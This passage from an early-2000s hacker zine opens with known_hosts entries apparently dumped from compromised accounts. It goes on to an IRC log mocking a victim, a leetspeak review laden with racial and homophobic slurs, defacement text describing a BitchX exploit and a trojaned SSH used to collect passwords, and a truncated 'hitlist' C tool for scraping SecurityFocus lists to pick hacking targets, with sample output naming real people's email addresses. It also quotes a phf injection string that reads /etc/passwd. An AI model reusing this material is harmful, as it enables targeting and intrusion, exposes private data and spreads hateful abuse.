home/users/knowfx/.ssh/known_hosts:132.170.44.44
home/users/james/.ssh/known_hosts2:home.strobe.org
home/users/knowfx/.ssh/known_hosts:132.170.44.44
home/users/knowfx/.ssh/known_hosts:neethosting.com
home/users/mux/.ssh/known_hosts2:mux.dyn.dhs.org
home/users/oobe/.ssh/known_hosts:64.208.38.2
home/users/par/.ssh/known_hosts:65.5.27.115
home/users/par/.ssh/known_hosts:65.5.27.252
home/users/rat/.ssh/known_hosts:port44.dorms44.ucf.edu
home/users/reject/.ssh/known_hosts2:zap.netfrag.com
home/users/scott/.ssh/known_hosts:mu.org
home/users/scott/.ssh/known_hosts:62.252.9.43
home/users/scott/.ssh/known_hosts:pav-l1.hotmail.com
home/users/soupnazi/.ssh/known_hosts:216.240.185.234
home/users/soupnazi/.ssh/known_hosts:209.191.170.8
home/users/soupnazi/.ssh/known_hosts:noodle-soup.fortunecity.com
home/users/soupnazi/.ssh/known_hosts:postal1.fortunecity.com
home/users/soupnazi/.ssh/known_hosts:lower.org
home/users/soupnazi/.ssh/known_hosts:132.170.44.44
home/users/soupnazi/.ssh/known_hosts:jimjones.niggacrazy.com
home/users/soupnazi/.ssh/known_hosts:legion2000.net
home/users/soupnazi/.ssh/known_hosts:shell.openhack.com
home/users/soupnazi/.ssh/known_hosts:ws1.nhl.com
home/users/soupnazi/.ssh/known_hosts:www.djalterego.com
home/users/soupnazi/.ssh/known_hosts:ws4temp.nhl.com
home/users/soupnazi/.ssh/known_hosts2:209.191.170.220
home/users/spider/.ssh/known_hosts:64.172.12.3
home/users/suid/.ssh/known_hosts:kernel.net
home/users/suid/.ssh/known_hosts:jawa.chilli.net.au
home/users/suid/.ssh/known_hosts:yowie.kg
home/users/suid/.ssh/known_hosts:61.12.32.120
home/users/suid/.ssh/known_hosts:ninjastrike.com
home/users/suid/.ssh/known_hosts:cpe-61-9-146-112.vic.bigpond.net.au
home/users/suid/.ssh/known_hosts:61.9.146.112
home/users/udp/.ssh/known_hosts:port44.dorms44.ucf.edu
home/users/udp/.ssh/known_hosts:coalesce.underworld.net
home/users/udp/.ssh/known_hosts:boredom.org
home/users/udp/.ssh/known_hosts:voodooland.net
home/users/udp/.ssh/known_hosts:leviathan.org
home/users/udp/.ssh/known_hosts:fire.efnet.org
home/users/walt/.ssh/known_hosts:pav-l1.hotmail.com
home/users/walt/.ssh/known_hosts:mu.org
home/users/yowie/.ssh/known_hosts:61.12.36.180
home/users/zmagic/.ssh/known_hosts:tdz.dhs.org
home/users/zmagic/.ssh/known_hosts:zsh.interniq.org
home/users/zmagic/.ssh/known_hosts:132.170.44.12
home/users/zmagic/.ssh/known_hosts:fire.efnet.org
home/users/zmagic/.ssh/known_hosts:216.30.134.185
home/users/zmagic/.ssh/known_hosts:users.interniq.org
home/users/zmagic/.ssh/known_hosts:syn.ackers.net
home/users/zmagic/.ssh/known_hosts:stardust.europeonline.net
home/users/zmagic/.ssh/known_hosts:phear.org
home/users/zmagic/.ssh/known_hosts2:rain.ktwo.ca
home/users/zmagic/.ssh/known_hosts2:frost.ktwo.ca
<pm> hehe
*** r0b1nleech is now known as WOW ***
*** WOW is now known as r0b1nleech ***
<pm> hahahahaha
<r0b1nleech> Wow man, hotmail, efnet, ktwo!
<r0b1nleech> You are probably the best guest I have ever owned, oops, I mean
+ interviewed for lyfestylez of the owned and lamest.
<pm> thanks r0biepoos
PART THREE:
<pm> remind them about the never been owned stuff
<r0b1nleech> Caviar dreams. We have just had a guest who personifies the
+ hacker life style. He hacks, He codes, He works for google, He's worked
+ for microsoft, He's been around. And one thing I would like to point out
+ about our guest, is that he has never been owned, and never will be.
<pm> yup, never been owned
<r0b1nleech> See, owning someone this incredibly lame takes an enourmous
+ amount of skill, which of course, no one has.
<r0b1nleech> In a fantasy world, where hacking is life, pm, one of the
+ greatest lamers around, lives the dream, lives the big life, drives
+ a bmw, and hangs out in #!w00w00. What more can you ask for? I leave
+ you with this final note:
<r0b1nleech> pm, has NEVER, EVER, EVER, EVER, I repeat NEVER EVER EVER
+ EVER EVER NEVER EVER EVER EVER EVER, been owned.
<r0b1nleech> good night, suck my fat dick, and wipe that dangling shit
+ off the tip of your dick stick.
<pm> yah bye, btw
<pm> NEVER BEEN OWNED
<pm> hah, cya
.~e~----------------------------------------------------------~e~.
; *05* muz1k in the undergr0und -- uncle m4v1s ;
`----------------------------------------------------------------'
muz1k 1n the undergr0und
by uncle m4v1s
---------------
the p4zt few ye4rz have s33n a surge 0f muz1kal tal3ntz
1n the d1g1t4l undergr0und.... fr0m the 4sh3z 0f g4ngst4h
r4p c0mez a new g3nr3 0f muz1k 2 rev0lut10n1z3 the w0rld
4ever... e-thug d1g1t4l r4p. uncle m4v1s h4z k0mp1l3d a
l1zt 0f 2dayz *h0ttezt* art1ztz 1n th3 haqr subkultur3 &
s0me rev1ewz...
the ph4t be4tz and krayzEeE b4ssl1nez u he4r 1n kutt1ng
edg3 e-thug d1g1t4l r4p w3r3 pi0neered by n0ne 0ther than
the m4ster bl4zt3r h1mself, h4g1z' sh0ckwave r1d3r.
sp0rt1ng h1z d33p-runn1n m1ztruzt 0f auth0rity 4nd h1z
1ntim8 kn0wledge 0f g4ng w4rf4re, the acqu1z1ti0n 0f
1llegal drugz & weap0nz, & the cl0zely gu4rd3d s3kr3t 0f
h0w 2 h1t th3 g-sp0t in 0ver 38 unique w4yz, he sh0qd th3
w0rld by pl4c1ng sh4dy & kl3v3rly w0rd3d c4tch phr4sez 1n
h1z IRCNAME variable. h3 br0ught h0n0r 2 h1z ment0rz eazy-e
and chuck-d by pr0v1d1ng 1nexper13nz3d wh1te k1dz on 1rc
w1th 4 d4nger0us and 4st0und1ng 1ns1ght 1n-2 wh4t 1t m34nz
2 b3 black, r3f3r3nc1ng such 1rc n4m3z az "1t t4k3z 4
n4t10n 0f m1ll1i0nz 2 h0ld my saq" [see publ1k 3n3my, 54].
0ften th3z3 0bskure l1n3z w0uld s3nd phell0w f@ wh1t3 h4qrz
dr3ss3d in BDUz & k0mbat b00tz runn1ng 2 g00gl3. wh3n mb'z
st4tuz az an undergr0und br0th4 wuz f1nal1zed [see "blaq 1z
merely 4 st4t3 0f m1nd", 82] 0therz were s00n 2 f0ll0w.
so1o 0f ph4med t33n haqr/he4rtThr0bz c0deZerO k0mb1n3d
h1z sk1ll3d kn0wledg3 0f purch4z1ng n1qlb4gz & begg1ng 4
k04dz wh3n h3 c0ined th3 3ver s0-p0pular k4tch phr4ze
"y() d4wg, 5up." & the r3zt u kn0w 1z h1zt0ry.
u k4n r34d m0re inph0 ab0ut s1 in m1ke sch1ffman'z upk0m1ng
b00k ent1tl3d "br0, 1m a h4qr n0t a k0d3r"
(ISBN 835827577158).
th0 d1g1t4l thugz in tha 2K+2 may !have (th4tz a l0g1k4l
neg4t10n, or "n0t have" 4 u untekn1k4l read3rz) even h34rd
0f nw4, they st1ll r3pruhz3nt the s4me c0ld he4rt-0f-
d4rkn3zz / str8 phr0m s0uth c3ntr4l m3nt4l1ty th@ fu3l3d
f34tz 0f m4str haqry 1n the m1d 90z, such 4z the t4ktik4l
l0gic-b0mb 1mpl4nt3d 1n-2 yah00. s0me k0mpl41n th@ the 1rc
thugz 0f the new m1ll3nn1um h4ve l0st ph0kuz 0f kreat1ng
hypn0t1z1ng phreakyPhr3$h phl0w & r 2 kaught up 1n s3ll1ng
drugz 0n 3fn3t 0r putt1ng up p1cz 0f the1r n3w r1mz 0n
th31r h3rt.0rg h0mepagez, but u k4n dec1de 4 y0urself.
ytcracker [the 0r1g1n4l d1g1t4l g4ng3r]
---------------------------------------
th3 f1rzt 2 expl1c1tly use the t3rm '0r1g1n4l d1g1t4l
g4ngst4h' when h3 gr4ff3d h1z mug 0n th3 dcaa website
11/23/99. the e-g1f p1ktur3, l00s3ly b4s3d 0n 4 ph0t0
t4k3n dur1ng th3 #sesame str33t 1rc sh0wd0wn sh0wz a
rugg1sh thugg1sh y0ung yT, dr3zz3d 4 b1t l1ke kR4zy t3d
k4cz1nszky [s33 http://www.paybackprod.com/hackedsites/dcaa]
w1th wh4t app34rz 2 be a huge g0ld ch41n k00l3ct3d
phr0m 3 m0nthz 0f p4wn1ng m0sth8d's e-l00t. th0 2 many @
ph1rst gl4nc3 h3 appe4rz 2 be we4r1ng a pe4c3 symb0l,
rum0rz circul8 th@ yT l00ted th1z r3l1c 4ft3r gunn1ng
d0wn a f4m1ly 0f as14n sh0p0wn3rz 1n k0ld bl00d
in the inf4m0uz LA ri0tz. st1ll 0therz s4y 1t 1z n0t a
p34c3 symb0l @-all, but r34lly a h00d 0rnament st0len
phr0m shuge kn1ghtz benz!! whut3v3r the true st0ry 1z,
ytcraqr h4z k0nt1nu3d 2 1nsp1r3 y0ung e-thugz w0rldw1d3.
1t 1z rep0rt3d th@ ytkrakr mp3z r h3r4d 4z f4r away az
k4r4ch1, wh3r3 h1z pr0tegez gf0rce p4k1st4n h4v3 sh0qd
l0c4l m0squez by bl4stn d1g1t4l h1ph0p 0uts1d3.
1n p4k1st4n, wh3r3 l1n0leum phl00rz r unava1lable, 0ne
gf0rce member, german_gu c4us3d qu1te a st1r by bec0ming
the ph1rzt musl1m bb0y 2 buzt 0ut 1n2 a w1ndm1ll 0n hiz
pr4y3r m4t.
unphortun4tely, m0zt 0f yTcr4ck3rz w0rk 1z unr3l34z3d, &
un4v4il4ble 4 d0wnl0ad. but 2 m4ny, th1z d0eznt m4tt3r,
4 th0ze wh0 v1e3 h1m 4z an 1k0n 0f s1n & rebell10n.
yt iz str8 up p10n33r.
r00tabega
---------
4z they r kall3d 0n their page, "r00tabega: 1ndepend3nt
hyde p4rk h1p h0p." damn h0w d0 i descr1be th1z except
az 'pr0l1f1k.' bansh33 p0pz 0ut new rele4s3z ph4ster
th4n 0l d1rty bast4rd k4n get b1tchez pregn4nt.
u k4n ch3ck 0ut th3z3 b34tz @
http://www.r00tabega.org/rap
th31r l8zt release 1z kalled 'the c0c00n' & m4n 1tz
exxxxxxxxxXtra phantast1kly phre$$$$$$$$$h.
r00tabegz phearl3zz leader 1z r1shi bh4t, u m1ght
r3m3mb3r h1m az th3 ugly l1tl krumbsn4tchr phr0m th3
ph1lm 'th3 1nd14n 1n the cupb04rd.'
u kan ch3ck h1z interv1ew @
http://www.rediff.com/chat/trans/0216rish.htm
4z we k4n c y0ung r1sh1 1z a k0l0rful ch4r4ct3r; he
st4rt3d haqng PRIMOS @ the age 0f 6, & wuz 1nsp1r3d
2 freestyle apht3r 0wn1ng h1z 1zt DMS100. wh4t d0ez r1sh1
d0 4 fun? w3ll the maztr h1mself repliez: "Programming,
Tennis, Piano, Clarinet, Rapping."
r00tabega, wh1ch ink0rp0r8z inkredible muzik4l/haqng
t4l3ntz such as the 1ncred1bl3 "busdr1v3r" (hehe he g0t
th1z n4m3 k0z he takez u all 2 sk00l!) and bansh33, r
seen by m4ny 4z a resp0nse 2 the 1nf4m0uz "ICY HOT
STUNTAHZ," an0th3r tr10 0f rap superstarZzzZ wh0 h4v3
b33n kn0wn 2 frequent the 3r1z PHR33 netw0rkz but d0 n0t
h4ck. 2 bansh33 th1z 1z 4ll th3 d1ff3r3nc3. wh3n 4sk3d
ab0ut h1z op1n10n 0f the 1cy h0t stunt4hz h3 pau4z3d 4
a m0ment, t0ld me 2 "h0ld up d4wg" and st4rt3d t4pp1ng
h1z f00t (he 0nly wearz LuGZ), 4nd r4pp3d @ me:
"y0 phuck 1cy h0t kuz theyre cheaterz... everyb0dy kn0wz
cuz wez eleEeter.... 1f 1 ever s4w bl4d3 1d st4b h1m
w1th a t00thp1ck, 1c3 l1v3z w1th h1z m0m & 1 h34r
fl4m3z g0t a sm4ll d1ck.... y0 y0 aiy0 d0nt step 2 my
krew, kuz 1ll fuqn k4p y0u. f00. t4p t4p ch3q." d4mn! iz
all i k4n s4y, koz th3 c0c00n 1z full 0f th1s sh1t.
4ngry lyrix... th3y t4lk ab0ut st4bb1ng th3ir l4wyerz
1n c0urt, dr1nk1n 40z wh1le talkin on th4 I SEEK Y0U,
buztn 0ut 0f j41l l1ke n3d k3lly, b1tch3z 1n h1gh sk00l
th@ cheat 0n algebr4 t3stz, h0w much p4y1ng ch1ld supp0rt
4 a bunch 0f k1dz suxxxx, m4n 1 d0nt even want 2 sp0il th1z,
itz tru-thug.
pers0nally my fav0r1te tr4ckz 0f th1z cd r #2. CHEATERZ &
#11. THE COURTR00M and 13. SH0W THEZE k4TZ (lab3ll3d 0n
th31r webs1te az *H0T*).
wh4t3v3r they d3c1d3 2 d0, r00tabega k33pz a p0s1t1v3 1m4g3.
r1sh1, 4z y0ung 1nd14n b0y gr0wn up 1n th3 gh3tt0 h4d 2
s1t by and w4tch h1z y0unger br0ther wear1ng a ch1cag0 bullz
jerzey get gunn3d d0wn 2 d34th by cr1pz. s331ng s0 much
vi0lence in h1z d4y, & w4tch1ng h1z g00d h0meb0yz m0st8d
& l00ph0le & m1ndphazr g0 2 the p3n, he m0urnz 4 th31r
return & the dayz 0f tru defac3m3nt thugg3ry. 1n hiz s0ngz,
he expl41nz, h0w new sk00l def4c3rz just d0nt underst4nd
what 1t uz3d 2 m34n 2 the el8z, the gHerz, the 3lv3z.
th1z album 1z def1n1tely a 2 thumbz up.
w00w00
------
ch3ck 1t 0ut @ http://www.w00w00.org/w00w00.mp3
w1th 0ver 30 memb3rz w0rldw1de & th1z 1z the b3st sh1t they
k0uld k0me up w1th!?!?!?!?
th1z 1z fuqn kr4p, 1tz even w0rse than th31r k0d3z.
w0uld u listen 2 a k0p r4pp1ng? 0k damn, s0 why the phuq
w0uld u l1st3n 2 a bunch 0f wh1teh@ l4m3rz pr3t3nd1ng 2
haq. 1f 1 were 1n the wu-t4ng kl4n 1 w0uld kut their n*tz
0ff, espec14lly th@ n4spt3r f4g.
m1xt3r
------
0k well th1z 1znt r34lly "thugg1sh" but 1tz undergr0und
h4qr muz1k s0 uncle m4v1s dec1d3d 2 rev1ew 1t just 4 u.
& th1z 1z n0 disappo1ntment e1th3r. m1xter haz sh0wn he
d0eznt just kn0w h0w 2 wr1te wh1tepap3rz 4 packetst0rm,
he k4n als0 wr1te s0me ph@ muz1k 2!
m1xt3r d0eznt even try 2 be a thug, h3z just pure h4qr.
w1th s0ng n4m3z like "/usr/bin/strings" and "1ntrusi0n
det3kt3d" and "/cgi-bin/phf?Qalias=%0acat%20/etc/passwd."
1 def1n1tely w0uld n0t rec0mmend th1z 4 l1st3n1ng 2 pe0ple
outs1d3 0f the 'sc3n3' becuz it iz 1nf0rmation 0verl0ad!
but 4 th0ze 0f u wh0 th1nk u h4v3 wh4t 1t t4k3z 2 dec1ph3r
hiz kryptik msgz, u k4n f1nd h1z muzik @
http://www.mp3.com/mixter/
th3z3 s0ngs rem1nd me a l0t 0f th1z 0ne t1me 1 s4w th3z3
2 austrian d00dz french k1ss1ng each0ther in an 'E wild 0n
1b1z4.' but enuf of th@
/usr/bin/strings s0undz a bit retro, with s0me atar1 l1ke
s0undz 2 rem1nd u of exactly h0w 0ld sk00l m1xter really is,
& synthlinez th@ w0uld bl0w depeche m0de 0ut 0f the w4t3r.
m1xt3r, as he l1k3z 2 r3f3r 2 himself az 'DJ MIXY' 2 th3
r3st 0f the w0rld 0fferz h1z serv1c3z 2 th3 c0mmun1ty
by dj'ing in s4f3 drug phr33 b4r m1tvahz in t3l av1v,
where h1z t0pn0tch internet sekur1ty k0mpany w1th phell0w
h4ck1ng st4rz ANALYZER and IZIK of hwa-security/d4rkn3t
1z l0c8d. s0met1m3z when he iz juzt "chiln 0ut" he k4n be
f0und d4nc1ng @ w1ld r4v3z @ the g4z4 str1p w1th h1z
p4t3nt3d redwhite'nblue gl0wst1ckz & vickz inh4l3r. but
h3 d03z m0st 0f h1z w0rk 4 fr33, s1nc3 az m4ny grey/bl4ckhatz
he shunz the c0mmercializ4t10n 0f s0phtjuarez & releasez hiz
trax under GPL! he als0 h0pez th@ 0ne day s0meb0dy w1ll B
insp1r3d by h1z s0ngz 2 0wn a univers1ty netw0rk w1th m1cr0s0ft
w1nd0wz src k0de & d0n8 the ph1nd1ngz 2 him! ~el8 4tt3mpt3d
2 k0nt4kt mixter 4 an 1nterv1ew ab0ut h1z muz1k but he angrily
d3kl1n3d, s4y1ng he w0uld never 't4lk 2 u squinty 3y3d
m0th3rphuckrz' as l0ng 4s 'th3 br34th 0f l1fe fu3l3d h1z
b0dy.' h3 th3n ch4ll3ng3d uncle m4v1s 2 "get my passw0rd
ph1le again" s1nce h1z b0x d0eznt all0w 0utg01ng em41lz 2
j4p4n anym0r3.
th1z wuz unfphortun8 but 4 the s4ke 0f 0bjekt1v1ty uncle
m4v1s g1vez thiz album a "p0sitive" rev1ew.
y0 well th@z all the muz1k 1 k0uld find 4 n0w!
r3m3mb3r 2 k33p 1t r34l
peace 0ut d/-\wGz.
.~e~----------------------------------------------------------~e~.
; *06* defacements of the milenium -- ~el8 ;
`----------------------------------------------------------------'
-----------------------.
anti.security.is owned 0 ~~~ :PpPPppPPPp
-----------------------'
turkey Oh, life it's bigger, it's bigger than you and you are not me
The lengths that I will go to, the distance in your eyes
WE ARE THE HACKERS WHO ACTUALLY HACK.
UNLIKE OTHER "HACKERS," WE DON'T SIT ON OUR WAREZ.
ACTION SPEAKS LOUDER THAN SILLY WORDS.
GOBBLES IS ABOUT GETTING THINGS DONE.
THANKS TO THE POP PSYCHOLOGISTS ON THE ANTISEC MESSAGE BOARD. YOUR
COMBINED PSYCHOANALYSIS MISSED UNCONTROLLABLE URGES TO DEFACE SECURITY
WEBSITES THOUGH!
2002 IS YEAR OF TURKEY. MAKE NO MISTAKE ABOUT THIS.
AND THERE'S NOTHING ANYONE CAN DO...
THIS HACK MADE POSSIBLE WITH BITCHX REMOTE EXPLOIT AGAINST JIMJONES
HOME COMPUTER THEN TROJANING HE SSH TO COLLECT PASSWORDS...
------------------------.
udp's livejournal owned 0 ~~~ :PpPPppPPPp
------------------------'
[2041] udp the lame phrack whore's LiveJournal
[Most Recent Entries] [Calendar View] [Friends]
Below are the 20 most recent journal entries recorded in udp the lame
phrack whore's LiveJournal:
[ << Previous 20 ]
Monday, December 31st, 2001
12:42 pm Been rereading Leisure Town and laughing my ass off. (Comment
on this)
11:38 am owned in the 2002
yo chek it, im fat & owned
keep it re4l
libnetx25
el8.8m.com
watch your back
we out (Comment on this)
Sunday, December 30th, 2001
4:12 pm Add Hope Sandoval to the list from the 25th. Fantastic. :)
Current Music: Mazzy Star - Wild Horses(2 Comments |Comment on this)
1:38 pm mmm. the big chill. you must get this track.
Current Mood: chillllled
Current Music: Mescalito - Shoreditch Oyster(Comment on this)
1:23 pm Desi-derata.
Current Mood: caffeinating
Current Music: Mescalito - Dark Corner Light(Comment on this)
Saturday, December 29th, 2001
10:10 pm hrm. looking at wmglobe, again, it seems most of the
populated human world is in darkness right now. whack. the sun's
shining high above the pacific; the pacific's enormous.
Current Music: Veruca Salt - Bodies(Comment on this)
3:14 pm Obviously CURRENT doesn't like my dirty hack of hijacking the
IPPROTO_RSVP pointer in ip_protosw[]. (Comment on this)
3:09 pm the sun is out. free of its grey bonds finally. eclectic love
washing over the city. (Comment on this)
2:57 pm Bah! I just loaded my driver into -CURRENT - BOOM! Works fine
on -STABLE though. Oh well, hacking time... (Comment on this)
11:47 am
Protected A rare sighting
*o* mudge [~mudge@0nus.l0pht.com] has joined #cdc
*o* irc.carrier1.net.uk Saturday December 29 2001 -- 11:44:25 +00:00
Hm! Just as I was about to head out for lunch, too... (Comment on
this)
11:43 am Musings on zen and singing.
An overcast day in London today. Dull grey cloud settled over the city
like white taffy, hydrogenated, a smooth constriction. I rise, wash,
put my boots on and make coffee. I feel the cool air rise against my
damp, freshly depilated skin. The thermostat clicks as the heater
switches off, the aesthetic of warmth lost on the machine, for it is
thus.
I run my hand over my forehead, and around my fringe. I smile, knowing
what it is to live in the moment, and that though our best laid plans
and fondest dreams may never come to fruition, living in the moment is
that which is most important.
After a spate of not being able to sleep well, I suddenly find myself
enjoying the most pleasant, restful night's sleep, and this has been
the case some three nights in a row now.
Last night my final thought before leaving wakefulness was this: how
does Kate Bush feel about her success and her life? I wonder if she
has always wanted to be where she has gotten to. I think one could
well ask these questions of any successful person. Is it atypical to
be blown off one's original course, and yet still discover one's own
New World? Or is it an occupational hazard?
When hungry, eat. When tired, sleep. (Comment on this)
12:25 am There are some screen grabs of my desktop from today here. (3
Comments |Comment on this)
Thursday, December 27th, 2001
1:26 pm Ok. I submitted 7 new FreeBSD ports inside 12 hours. Can I
have a biscuit? (2 Comments |Comment on this)
7:24 am Submitted FreeBSD port for x11-fonts/gfe (GNU Font Editor
0.0.4). (Comment on this)
Wednesday, December 26th, 2001
10:05 pm Without memories, a race has no future. (3 Comments |Comment
on this)
Tuesday, December 25th, 2001
1:20 pm A quiet day of fond restitude, for the weary traveller.
Mmmm. Having a very chilled out Yule; curling up with some Baileys and
wotnot, listening to music and reading books. What a holiday should be
at this time of year, I think. A time to nurture dreams anew and sow
amongst the furrows of the psyche.
Been on a different tack with mp3 playlists lately, need female
vocalists to pace out all this D'n'B, industrial, trance... so this
manifests itself in the form of Tori Amos, Paula Cole, Beth Orton,
Alison Moyet, Louise Post (of Veruca Salt fame), Sarah McLachlan, and
of course, Kate Bush.
As for the delectable Ms Bush, she will hopefully have an album out
during 2002, which I am looking forward to with anticipation. I still
hold Wuthering Heights to be one of her best tracks of all time... In
the meantime, you might like to check out Paula Cole's work. She
teamed up with Peter Gabriel on his Secret World Tour in 1993, and you
can hear her passion, and diverse vocal range, on tracks such as Talk
To Me and Hush Hush Hush. Those of you who are fans of Peter Gabriel
also will also clock that Peter's last longstanding female vocal
partner was... stand up, Kate Bush!
As a longstanding fan of Peter's work I have to say I admire his knack
for working with the female voice. He confessed that it was a skill he
acquired over many years, in an interview on ITV (1993, UK); indeed
much of his work from the late 1970s, after he split from Genesis,
took on more of a masculine edge than what one experiences from his
albums So (1986) and Us (1992); the latter was produced by the
brilliant Daniel Lanois, featured on U2's superb Achtung Baby (1990).
Paula, however, reveals a much flirtier side to her work, in a song
from the motion picture soundtrack for the Wim Wenders film City of
Angels, a track entitled Feelin' Love. As you can see from the lyric
sheet, it's quite candid, but you really have to hear her singing
this; she manages to come across as sensual without being kitsch or
trashy. It's a departure from her other tracks, lest we begin to think
the adorable Miss Cole is a goody two-shoes.
I can't really put into words how enthused I am by her talent. Her
voice helps to create a fertile creative space for me; it's only over
the past two years or so that I've begun to realize how essential the
immediate environment is to the creative act, be that making music,
writing code, sculpting; or any other form of play.
Isolation alone is not the way to get the job done; often it's good to
invite a bunch of friends over, share the Baileys or Jasmine tea or
whatever the tipple is, and then return to one's work, having given
the machine-mind a rest and returned to social consciousness, if only
for a few hours.
My plans for 1Q 2002 are still being worked on; I also need to decide
what to do this upcoming summer. I'm open to suggestions for places to
visit, hang out, have a good time.
And like that rubberband girl in the red shoes, I bounce back on my
feet. Fond greetings to friends present and past, in whatever mode you
choose to celebrate the Solstice; I wish you all well.
Current Mood: pleasantly inert
Current Music: Kate Bush - Rubberband Girl(1 Comment |Comment on this)
Thursday, November 29th, 2001
2:16 pm Just woke up. Urrrrrrrrgggggh.
Upgraded the -CURRENT box late last night - the change alone from a
Realtek to an Intel FXP makes a *massive* difference. FreeBSD now
supports every single bit of hardware in the box. Matt Dillon gave an
interview very recently where he cites the current SMPng work and the
OpenGL support as the main hurdles to be overcome for FreeBSD at the
moment. I agree - once OpenGL support is in place, I will have very
little reason to run Windows, or even Linux, for that matter, ever
again. One exception is IrDA support, but I might choose to port that
anyway.
Anyway. I'm eating a pot rice at the moment, deferring real food until
we (people are here) decide what we're going to do. *stretches*
(Comment on this)
Wednesday, November 28th, 2001
11:11 am Is it any wonder I can't sleep? (apologies to Smashing
Pumpkins) Woke up at 10pm last night, my sleeping pattern is TOTALLY
shafted... it's out of control, and the kids just love it! (props to
KMFDM...)
As of this morning I've written FreeBSD ports entries for Dug Song's
libdnet, a portable packet generation and low-level networking API,
and Tony Curtis's wots, which is an extremely cool system log
monitoring program written in Perl. I've been using wots for literally
years now. Rock on. Hopefully other people will find them useful.
qtop is working spankingly for my droptail queues on the WaveLAN
gateway, but I need to clean up the code, fix it to work with RED/wRED
dispatcher, and get it committed to FreeBSD-CURRENT.
Current Music: Technical Itch - Deadline(Comment on this)
Monday, November 26th, 2001
9:25 am Access granted.
I've just written and released a tool to perform real-time monitoring
of the FreeBSD Bandwidth Shaper, as part of the Consume Project. It's
essential that we be able to throttle bandwidth on a per-node basis to
prevent wired links to the mobile cloud becoming saturated. This tool
will help us to configure the bandwidth shaper at each node.
Getting the hang of the masking for the packet flow sets is quite
tricky; this will help the community networking effort by allowing
people to experiment with bandwidth throttling and getting visual (as
well as anecdotal) feedback on the effect of their configuration
changes.
You MUST get the track I'm listening to. At the moment I'm pretty
frazzled on caffeine having been awake for most of the weekend and
Friday, and have the heating turned down to keep me frosty.
Oh yeah. What else is cool. ParMaster hung with us at the weekend.
Current Mood: accomplished
Current Music: Apoptygma Berzerk - Kathy's Song (Ferry Corsten
Remix)(1 Comment |Comment on this)
Monday, November 19th, 2001
3:06 am ick, writing parsers is such a chore. (Comment on this)
[ << Previous 20 ]
My Website About LiveJournal.com
.~e~----------------------------------------------------------~e~.
; *07* ~el8 hitlist tools -- uncle m4v1s ;
`----------------------------------------------------------------'
~el8 ~el8
has has
generated generated
hitlists hitlists
for for
every every
security security
related related
mailing mailing
list list
known 4r3z known
to urfukd to
mankind mankind
h3re y0u g0 d00dz, str8 fr0m the ~el8 w4r3z gr4bb4g. th1s t00l w1ll
h3lp 0ur f0ll0w3rz by cre4t1ng h1tl1sts of emails/systems that p0st
t0 vari0uz security f0cus mailing lists.
~el8 ADVISORY STYLE S0LLUTI0N: d0nt p0st t0 th3z3 mail1ng lizts
ex4mple 0utput: $ ./hitlist 1
LAMER: sh0@libertynet.de (sh0)
LAMER BOX: cybersilo.lnx
LAMER: tsmith@zonelabs.com (Te Smith)
LAMER BOX: mail.securityfocus.com
LAMER: merchantjosh@qwest.net (Joshua Merchant)
LAMER: draht@suse.de (Roman Drahtmueller)
LAMER BOX: dent.suse.de
LAMER: secnotif@microsoft.com (Microsoft Product Security)
LAMER: newsflash@macromedia.com (Macromedia Security Alert)
LAMER BOX: rsigate.macromedia.com
LAMER: joacim@axis.com (Joacim Tullberg)
LAMER BOX: mail.securityfocus.com
LAMER: tluce@pti-pump.com (Timothy Luce)
LAMER BOX: PTIPump.com
LAMER: support_feedback@us-support.external.hp.com (IT Resource)
LAMER: wichert@wiggy.net (Wichert Akkerman)
LAMER BOX: wiggy.net
LAMER: raistlin@gioco.net (Raistlin)
LAMER: cadence@apollo.aci.com.pl (Tomasz Grabowski)
LAMER: dotslash@snosoft.com (KF)
LAMER BOX: snosoft.com
LAMER: flatline@blackhat.nl (flatline)
LAMER BOX: mail.werkopmaat.nl
LAMER: adonis1@videotron.ca (Adonis.No.Spam)
LAMER BOX: videotron.ca
LAMER: gobbles@hushmail.com
LAMER BOX: mailserver1.hushmail.com
LAMER: seclsts@fast.net (Rich Henning)
LAMER BOX: fast.net
LAMER: alexm@pycckue.org (alex medvedev)
LAMER: pr0ix@def-con.org (pr0ix)
[CUT_HERE] hitlist.c
/*
* l4m3r l1zt3r v1.0 by uncle m4v1s
* th1z 1z a s1mple t00l th@ ~el8 haz been uzing 4 several ye4rz,
* ever s1nce pr0ject m4yh3m wuz 1st st4rt3d.
* 1tz a 1-use t00l, juzt run th1z on any 0ne of the k-l4m3
* s1tez upd8d by secur1tyf0cus.com on the1r ml-p0rtal, &
* u n0w h4ve a l1zt 0f ret4rdz 2 hack and st34l "0day" from.
* th1zt skr1pt g0ez back s3v3ral ye4rz s0 u get the ch4nc3 2
* ch3ck 0ut r34l b0xez th@ were uz3d be4 the gr34t p4n-l4m3r
* 3ff0rt 2 get sc3n3 sh3llz 2 h1de the1r 1dent1t3z.
* by t4rg3tt1ng p0stz by p0l1te sekur1ty pr0fess10nalz &
* 0wn1ng the1r `sh1t` and r4v4g1ng th3 kn0wn_h0stz 0n the ab0ve
* b0x3z, we n0t1c3d the subtl3 c0rrel4t10n betw33n m4n & myth,
* 4nd st4rt3d 2 rek0gn1z3 the k0rrel4t10n betw33n REAL PEOPLE &
* the 0nl1ne 1dent1t3z they assum3d. 4 example, 0wn 4ll russ14n
* bugtraq p0st3rz s1nce 1997 and u w1ll n0t1c3 4t l34zt 0ne 0f
* th3m l0gg1ng 1nt0 z0l0.fr33lsd.n3t/c4nn4b1z.dataf0rce.net (hi str!)
* 4nyh0w, 4z rule #2 of pr0jekt m4yh3m g0ez, if u c4nt st34l w4r3z
* 0r sn1ff, rm the fukrz!
* h4ppy hunt1ng
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <string.h>
#include <ctype.h>
#include <netinet/in.h>
#include <netdb.h>
/* Request prefix that makeurl() puts in front of every path it is given. */
#define PREFIX "GET http://online.securityfocus.com"
/* Request line main() sends when no category number is given on the command line. */
#define BASE_CMD "GET http://online.securityfocus.com/archive/1"
/* Server address shared by every connection: filled in once by main(),
 * read by connecthost(). */
struct sockaddr_in sinz;
/* One selectable archive category: lamercode is the label printed by the
 * usage listing in main(), url is the complete request line sent for it.
 * The array index is the number accepted as argv[1]. */
struct target{
char *lamercode;
char *url;
} targets[] =
{ {"ARIS USERZ","GET http://online.securityfocus.com/archive/114"},
{"bugtraq[lol]","GET http://online.securityfocus.com/archive/1"},
{"bugtraq-es (bugtraq in spain jajaja)",
"GET http://online.securityfocus.com/archive/80"},
{"bugtraq-jp & shadowpenguin friendz",
"GET http://online.securityfocus.com/archive/79"},
